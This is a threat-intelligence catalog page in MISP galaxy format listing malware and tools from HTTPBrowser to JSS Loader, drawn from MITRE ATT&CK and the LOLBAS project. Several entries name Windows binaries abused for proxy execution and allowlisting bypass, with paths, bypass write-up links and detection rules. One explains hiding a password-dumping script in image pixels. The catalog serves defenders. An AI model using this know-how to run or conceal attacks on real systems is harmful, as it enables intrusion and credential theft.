tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['tool']
Related clusters

To see the related clusters, click here.

HTTPBrowser

HTTPBrowser is malware that has been used by several threat groups. [ThreatStream Evasion Analysis] [Dell TG-3390] It is believed to be of Chinese origin. [ThreatConnect Anthem]

Internal MISP references

UUID c4fe23f7-f18c-40f6-b431-0b104b497eaa which can be used as a unique global reference for HTTPBrowser in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0070
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

httpclient

httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. [CrowdStrike Putter Panda]

Internal MISP references

UUID bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49 which can be used as a unique global reference for httpclient in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0068
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Hydraq

Hydraq is a data-theft trojan first used by Elderwood in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including APT17.[MicroFocus 9002 Aug 2016][Symantec Elderwood Sept 2012][Symantec Trojan.Hydraq Jan 2010][ASERT Seven Pointed Dagger Aug 2015][FireEye DeputyDog 9002 November 2013][ProofPoint GoT 9002 Aug 2017][FireEye Sunshop Campaign May 2013][PaloAlto 3102 Sept 2015]

Internal MISP references

UUID 4ffbca79-358a-4ba5-bfbb-dc1694c45646 which can be used as a unique global reference for Hydraq in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0203
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

HyperBro

HyperBro is a custom in-memory backdoor used by Threat Group-3390.[Unit42 Emissary Panda May 2019][Securelist LuckyMouse June 2018][Hacker News LuckyMouse June 2018]

Internal MISP references

UUID 57cec527-26fb-44a1-b1a9-506a3af2c9f2 which can be used as a unique global reference for HyperBro in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0398
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

HyperStack

HyperStack is an RPC-based backdoor used by Turla since at least 2018. HyperStack has similarities to other backdoors used by Turla, including Carbon.[Accenture HyperStack October 2020]

Internal MISP references

UUID ba3236e9-c86b-4b5d-89ed-7f71940a0588 which can be used as a unique global reference for HyperStack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0537
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

IceApple

IceApple is a modular Internet Information Services (IIS) post-exploitation framework that has been used since at least 2021 against the technology, academic, and government sectors.[CrowdStrike IceApple May 2022]

Internal MISP references

UUID 5a73defd-6a1a-4132-8427-cec649e8267a which can be used as a unique global reference for IceApple in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1022
source MITRE
type ['malware']

IcedID

IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns.[IBM IcedID November 2017][Juniper IcedID June 2020]

Internal MISP references

UUID 7f59bb7c-5fa9-497d-9d8e-ba9349fd9433 which can be used as a unique global reference for IcedID in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0483
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Ie4uinit

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Executes commands from a specially prepared ie4uinit.inf file.

Author: Oddvar Moe

Paths:
* c:\windows\system32\ie4uinit.exe
* c:\windows\sysWOW64\ie4uinit.exe
* c:\windows\system32\ieuinit.inf
* c:\windows\sysWOW64\ieuinit.inf

Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

Detection:
* IOC: ie4uinit.exe copied outside of %windir%
* IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
* Sigma: proc_creation_win_lolbin_ie4uinit.yml
[Ie4uinit.exe - LOLBAS Project]

Internal MISP references

UUID 332e37c0-63fe-4e99-85a9-94210d42c21d which can be used as a unique global reference for Ie4uinit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5116
source Tidal Cyber
tags ['f32f1513-7277-4257-9c35-c8ab3da17c84', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Ieadvpack

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.

Author: LOLBAS Team

Paths:
* c:\windows\system32\ieadvpack.dll
* c:\windows\syswow64\ieadvpack.dll

Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
* https://twitter.com/pabraeken/status/991695411902599168
* https://twitter.com/0rbz_/status/974472392012689408

Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___advpack.yml[Ieadvpack.dll - LOLBAS Project]

Internal MISP references

UUID e1aa3cbd-2337-47d6-b6b0-beb5d1bbfc1e which can be used as unique global reference for Ieadvpack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5190
source Tidal Cyber
tags ['e794994d-c38a-44d9-9253-53191ca9e56b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

iediagcmd

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Diagnostics Utility for Internet Explorer

Author: manasmbellani

Paths:
* C:\Program Files\Internet Explorer\iediagcmd.exe

Resources:
* https://twitter.com/Hexacorn/status/1507516393859731456

Detection:
* Sigma: https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml
* IOC: Sysmon Event ID 1
* IOC: Execution of process iediagcmd.exe with /out could be suspicious[iediagcmd.exe - LOLBAS Project]

Internal MISP references

UUID 1feba268-9fff-495f-94e9-5b46336bff3b which can be used as unique global reference for iediagcmd in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5117
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Ieexec

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

Resources:
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

Detection:
* Sigma: proc_creation_win_lolbin_ieexec_download.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* IOC: Network connections originating from ieexec.exe may be suspicious[Ieexec.exe - LOLBAS Project]

Internal MISP references

UUID e7ede205-4d50-42c3-92d0-4988aca5c4a1 which can be used as unique global reference for Ieexec in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5118
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Ieframe

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Internet Browser DLL for translating HTML code.

Author: LOLBAS Team

Paths:
* c:\windows\system32\ieframe.dll
* c:\windows\syswow64\ieframe.dll

Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/997690405092290561
* https://windows10dll.nirsoft.net/ieframe_dll.html

Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml[Ieframe.dll - LOLBAS Project]

Internal MISP references

UUID 57072f02-06c1-4267-b665-fbbf72b96bb4 which can be used as unique global reference for Ieframe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5191
source Tidal Cyber
tags ['fc23fb85-8c48-4f0b-aeb6-b78fd6e25e0a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ifconfig

ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. [Wikipedia Ifconfig]

Internal MISP references

UUID 93ab16d1-625e-4b1c-bb28-28974c269c47 which can be used as unique global reference for ifconfig in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0101
source MITRE
type ['tool']

iKitten

iKitten is a macOS exfiltration agent [objsee mac malware 2017].

Internal MISP references

UUID 71098f6e-a2c0-434f-b991-6c079fd3e82d which can be used as unique global reference for iKitten in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0278
source MITRE
type ['malware']

Ilasm

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to compile C# code into a DLL or EXE.

Author: Hai vaknin (lux)

Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe

Resources:
* https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt

Detection:
* IOC: Ilasm may not be used often in production environments (such as on endpoints)
* Sigma: proc_creation_win_lolbin_ilasm.yml[Ilasm.exe - LOLBAS Project]

Internal MISP references

UUID 492104c0-79d6-461e-9dc5-0e4bfd3f2387 which can be used as unique global reference for Ilasm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5119
source Tidal Cyber
tags ['8bcce456-e1dc-4dd0-99a9-8334fd6f2847', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

IMEWDBLD

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft IME Open Extended Dictionary Module

Author: Wade Hickey

Paths:
* C:\Windows\System32\IME\SHARED\IMEWDBLD.exe

Resources:
* https://twitter.com/notwhickey/status/1367493406835040265

Detection:
* Sigma: net_connection_win_imewdbld.yml[IMEWDBLD.exe - LOLBAS Project]

Internal MISP references

UUID 2ef7c673-a0dc-4773-a9fd-337ed68d9b0b which can be used as unique global reference for IMEWDBLD in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5115
source Tidal Cyber
tags ['796962fe-56d7-4816-9193-153da0be7c10', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Imminent Monitor

Imminent Monitor was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[Imminent Unit42 Dec2019]

Internal MISP references

UUID 925fc0db-9315-4703-9353-1d0e9ecb1439 which can be used as unique global reference for Imminent Monitor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0434
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['tool']
Related clusters

Impacket

Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.[Impacket Tools]

Internal MISP references

UUID cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c which can be used as unique global reference for Impacket in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0357
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '6a80006a-ff1c-48e8-bb6f-d109d7b7a2fc', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

Industroyer

Industroyer is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.[ESET Industroyer] Industroyer was used in the attacks on the Ukrainian power grid in December 2016.[Dragos Crashoverride 2017] This is the first publicly known malware specifically designed to target and impact operations in the electric grid.[Dragos Crashoverride 2018]

Internal MISP references

UUID 09398a7c-aee5-44af-b99d-f73d3b39c299 which can be used as unique global reference for Industroyer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0604
source MITRE
tags ['37dff778-95a6-4e51-a26a-1d399ef713be']
type ['malware']
Related clusters

Industroyer2

Industroyer2 is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in Industroyer. Security researchers assess that Industroyer2 was designed to cause impact to high-voltage electrical substations. The initial Industroyer2 sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022; however, it was discovered before it was deployed, resulting in no impact.[Industroyer2 Blackhat ESET]

Internal MISP references

UUID 53c5fb76-a690-55c3-9e02-39577990da2a which can be used as unique global reference for Industroyer2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S1072
source MITRE
tags ['37dff778-95a6-4e51-a26a-1d399ef713be']
type ['malware']
Related clusters

Infdefaultinstall

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary used to perform installation based on content inside inf files

Author: Oddvar Moe

Paths:
* C:\Windows\System32\Infdefaultinstall.exe
* C:\Windows\SysWOW64\Infdefaultinstall.exe

Resources:
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

Detection:
* Sigma: proc_creation_win_infdefaultinstall_execute_sct_scripts.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Infdefaultinstall.exe - LOLBAS Project]

Internal MISP references

UUID e35b5513-4370-4f8c-b3a6-1f64c65f1e85 which can be used as unique global reference for Infdefaultinstall in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5120
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

InnaputRAT

InnaputRAT is a remote access tool that can exfiltrate files from a victim’s machine. InnaputRAT has been seen out in the wild since 2016. [ASERT InnaputRAT April 2018]

Internal MISP references

UUID e42bf572-1e70-4467-a4b7-5e22c776c758 which can be used as unique global reference for InnaputRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0259
source MITRE
type ['malware']

Installutil

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies.

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool

Detection:
* Sigma: proc_creation_win_instalutil_no_log_execution.yml
* Sigma: proc_creation_win_lolbin_installutil_download.yml
* Elastic: defense_evasion_installutil_beacon.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Installutil]

Internal MISP references

UUID c983bb77-b96c-44d5-b3f8-2540d7c604db which can be used as unique global reference for Installutil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5121
source Tidal Cyber
tags ['a3f84674-3813-4993-9e34-39cdaa19cbd1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Interactsh

According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is "an open-source tool for detecting external interactions (communication)". The Advisory further states that the tool is "used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity".[U.S. CISA Zoho Exploits September 7 2023]

Internal MISP references

UUID 9ec3777d-9a36-4822-a3e2-a7ce5d296309 which can be used as unique global reference for Interactsh in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5049
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee']
type ['tool']

Inveigh

Inveigh is an open-source utility. According to its GitHub project page, it is a "machine-in-the-middle" tool designed for penetration testing purposes.[GitHub Inveigh]

Internal MISP references

UUID 5658f260-8e96-4fa5-9863-189660048e5d which can be used as unique global reference for Inveigh in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5272
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']

InvisiMole

InvisiMole is a modular spyware program that has been used by the InvisiMole Group since at least 2013. InvisiMole has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in Ukraine and Russia. Gamaredon Group infrastructure has been used to download and execute InvisiMole against a small number of victims.[ESET InvisiMole June 2018][ESET InvisiMole June 2020]

Internal MISP references

UUID 3ee4c49d-2f2c-4677-b193-69f16f2851a4 which can be used as unique global reference for InvisiMole in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0260
source MITRE
type ['malware']

Invoke-PSImage

Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing the script either from a file or from the web. An example of usage is taking the PowerShell code from the Invoke-Mimikatz module and embedding it into an image file. When the image file is then called from a macro, for example, the macro downloads the picture and executes the PowerShell code, which in this case dumps the passwords. [GitHub Invoke-PSImage]

Internal MISP references

UUID 2200a647-3312-44c0-9691-4a26153febbb which can be used as unique global reference for Invoke-PSImage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0231
source MITRE
type ['tool']
Related clusters

IOBit

IOBit is a self-described "freeware" tool that can ostensibly be used to "clean, optimize, speed up and secure" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.[U.S. CISA Play Ransomware December 2023]

Internal MISP references

UUID 9c955014-2d83-4b5b-9127-cfc49e86779f which can be used as unique global reference for IOBit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5080
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

ipconfig

ipconfig is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. [TechNet Ipconfig]

Internal MISP references

UUID 4f519002-0576-4f8e-8add-73ebac9a86e6 which can be used as unique global reference for ipconfig in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0100
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

IronNetInjector

IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads, including ComRAT.[Unit 42 IronNetInjector February 2021]

Internal MISP references

UUID 9ca96281-8ff9-4619-a79d-16c5a9594eae which can be used as unique global reference for IronNetInjector in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0581
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['tool']
Related clusters

ISMInjector

ISMInjector is a Trojan used to install another OilRig backdoor, ISMAgent. [OilRig New Delivery Oct 2017]

Internal MISP references

UUID 752ab0fc-7fa1-4e54-bd9a-7a280a38ed77 which can be used as unique global reference for ISMInjector in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0189
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

Ixeshe

Ixeshe is a malware family that has been used since at least 2009 against targets in East Asia. [Moran 2013]

Internal MISP references

UUID 6dbf31cf-0ba0-48b4-be82-38889450845c which can be used as unique global reference for Ixeshe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0015
source MITRE
type ['malware']
Related clusters

Jaguar Tooth

Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.[U.S. CISA APT28 Cisco Routers April 18 2023]

According to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.[UK NCSC Jaguar Tooth April 18 2023]

Related Vulnerabilities: CVE-2017-6742[U.S. CISA APT28 Cisco Routers April 18 2023]

Internal MISP references

UUID 0eb47e25-56ec-42ba-9850-e50450b853e0 which can be used as unique global reference for Jaguar Tooth in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Network']
software_attack_id S5061
source Tidal Cyber
tags ['af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', 'f01290d9-7160-44cb-949f-ee4947d04b6f', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['malware']
Related clusters

Janicab

Janicab is an OS X trojan that relied on a valid developer ID and oblivious users to install it. [Janicab]

Internal MISP references

UUID a4debf1f-8a37-4c89-8ebc-31de71d33f79 which can be used as unique global reference for Janicab in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0163
source MITRE
type ['malware']

Javali

Javali is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.[Securelist Brazilian Banking Malware July 2020]

Internal MISP references

UUID 853d3d18-d746-4650-a9bd-c36a0e86dd02 which can be used as unique global reference for Javali in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0528
source MITRE
type ['malware']

JCry

JCry is ransomware written in Go. It was identified as part of the #OpJerusalem 2019 campaign.[Carbon Black JCry May 2019]

Internal MISP references

UUID 41ec0bbc-65ca-4913-a763-1638215d7b2f which can be used as unique global reference for JCry in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0389
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

JHUHUGIT

JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware. [Kaspersky Sofacy] [F-Secure Sofacy 2015] [ESET Sednit Part 1] [FireEye APT28 January 2017]

Internal MISP references

UUID d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae which can be used as unique global reference for JHUHUGIT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0044
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

JPIN

JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way. [Microsoft PLATINUM April 2016]

Internal MISP references

UUID c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f which can be used as unique global reference for JPIN in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0201
source MITRE
type ['malware']
Related clusters

jRAT

jRAT is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of jRAT have been distributed via a software-as-a-service platform, similar to an online subscription model.[Kaspersky Adwind Feb 2016] [jRAT Symantec Aug 2018]

Internal MISP references

UUID 42fe9795-5cf6-4ad7-b56e-2aa655377992 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Android', 'Windows']
software_attack_id S0283
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']
Related clusters

Jsc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe

Resources:
* https://twitter.com/DissectMalware/status/998797808907046913
* https://www.phpied.com/make-your-javascript-a-windows-exe/

Detection:
* Sigma: proc_creation_win_lolbin_jsc.yml
* IOC: Jsc.exe should normally not run on a system unless it is used for development.[Jsc.exe - LOLBAS Project]

Internal MISP references

UUID 1c67bf0b-22f8-4f57-8f91-f15b4923455f which can be used as unique global reference for Jsc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5122
source Tidal Cyber
tags ['ee16a0c7-b3cf-4303-9681-b3076da9bff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

JSS Loader

JSS Loader is a Remote Access Trojan (RAT) with .NET and C++ variants that has been used by FIN7 since at least 2020.[eSentire FIN7 July 2021][CrowdStrike Carbon Spider August 2021]

Internal MISP references

UUID c67f3029-a26c-4752-b7f1-8e3369c2f79d which can be used as unique global reference for JSS Loader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0648
source MITRE
